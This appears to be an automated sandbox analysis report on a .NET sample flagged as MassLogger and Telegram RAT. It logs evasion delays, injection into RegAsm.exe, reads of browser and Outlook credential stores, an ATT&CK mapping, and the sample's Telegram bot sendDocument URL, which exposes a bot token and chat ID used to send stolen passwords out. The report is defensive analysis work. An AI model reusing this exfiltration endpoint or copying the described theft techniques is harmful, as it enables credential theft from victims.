Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -598687s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -598578s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -598469s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -598334s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -598219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -598109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -598000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -597890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -597781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -597672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -597562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -597453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -597344s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -597219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -597109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -597000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -596890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -596781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -596672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -596562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -596453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -596344s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -596233s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -596125s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -596015s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -595906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -595797s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -595687s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -595578s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -595469s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -595359s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -595250s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -595140s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -595031s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -594896s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -594780s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -594671s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -594541s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\z87sammylastborn.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598334	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596233	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594896	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594780	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594541	Jump to behavior

Source: RegAsm.exe, 00000003.00000002.4533054853.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_02A4C168 LdrInitializeThunk,LdrInitializeThunk,

3_2_02A4C168

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\z87sammylastborn.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\z87sammylastborn.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\z87sammylastborn.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\z87sammylastborn.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41A000	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41C000	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 8CC008	Jump to behavior

Source: C:\Users\user\Desktop\z87sammylastborn.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Jump to behavior

Source: C:\Users\user\Desktop\z87sammylastborn.exe	Queries volume information: C:\Users\user\Desktop\z87sammylastborn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\z87sammylastborn.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected MassLogger RAT

Source: Yara match	File source: 0.2.z87sammylastborn.exe.3b3e220.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.z87sammylastborn.exe.3b3e220.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.z87sammylastborn.exe.3afd1b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.z87sammylastborn.exe.3ad3380.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: z87sammylastborn.exe PID: 5656, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2276, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.z87sammylastborn.exe.3b3e220.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.z87sammylastborn.exe.3b3e220.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.z87sammylastborn.exe.3afd1b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.z87sammylastborn.exe.3ad3380.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: z87sammylastborn.exe PID: 5656, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2276, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Yara match	File source: 0.2.z87sammylastborn.exe.3b3e220.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.z87sammylastborn.exe.3b3e220.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.z87sammylastborn.exe.3afd1b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.z87sammylastborn.exe.3ad3380.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: z87sammylastborn.exe PID: 5656, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2276, type: MEMORYSTR

Remote Access Functionality

Yara detected MassLogger RAT

Source: Yara match	File source: 0.2.z87sammylastborn.exe.3b3e220.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.z87sammylastborn.exe.3b3e220.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.z87sammylastborn.exe.3afd1b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.z87sammylastborn.exe.3ad3380.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: z87sammylastborn.exe PID: 5656, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2276, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.z87sammylastborn.exe.3b3e220.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.z87sammylastborn.exe.3b3e220.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.z87sammylastborn.exe.3afd1b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.z87sammylastborn.exe.3ad3380.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: z87sammylastborn.exe PID: 5656, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2276, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	1 Masquerading	1 OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
z87sammylastborn.exe	51%	Virustotal		Browse
z87sammylastborn.exe	76%	ReversingLabs	ByteCode-MSIL.Trojan.MassloggerRAT
z87sammylastborn.exe	100%	Avira	HEUR/AGEN.1306813
z87sammylastborn.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://api.telegram.orgd	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.48.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	132.226.247.73	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://api.telegram.org/bot7808791546:AAHW1HtuPv5PTKyABxs64lTNvFxWfoJO5x4/sendDocument?chat_id=6790572687&caption=user%20/%20Passwords%20/%208.46.123.189	false	high
http://checkip.dyndns.org/	false	high
https://reallyfreegeoip.org/xml/8.46.123.189	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot7808791546:AAHW1HtuPv5PTKyABxs64lTNvFxWfoJO5x4/sendDocument?chat_id=6790	RegAsm.exe, 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	RegAsm.exe, 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189l	RegAsm.exe, 00000003.00000002.4534096761.0000000002B70000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	RegAsm.exe, 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.comd	RegAsm.exe, 00000003.00000002.4534096761.0000000002B70000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	z87sammylastborn.exe, 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://reallyfreegeoip.orgd	RegAsm.exe, 00000003.00000002.4534096761.0000000002B8D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189d	RegAsm.exe, 00000003.00000002.4534096761.0000000002B70000.00000004.00000800.00020000.00000000.sdmp	false		high
http://reallyfreegeoip.org	RegAsm.exe, 00000003.00000002.4534096761.0000000002B8D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.orgd	RegAsm.exe, 00000003.00000002.4534096761.0000000002B70000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	RegAsm.exe, 00000003.00000002.4534096761.0000000002B70000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.telegram.orgd	RegAsm.exe, 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org	RegAsm.exe, 00000003.00000002.4534096761.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4534096761.0000000002B5E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.com	RegAsm.exe, 00000003.00000002.4534096761.0000000002B70000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.telegram.org	RegAsm.exe, 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmp	false		high
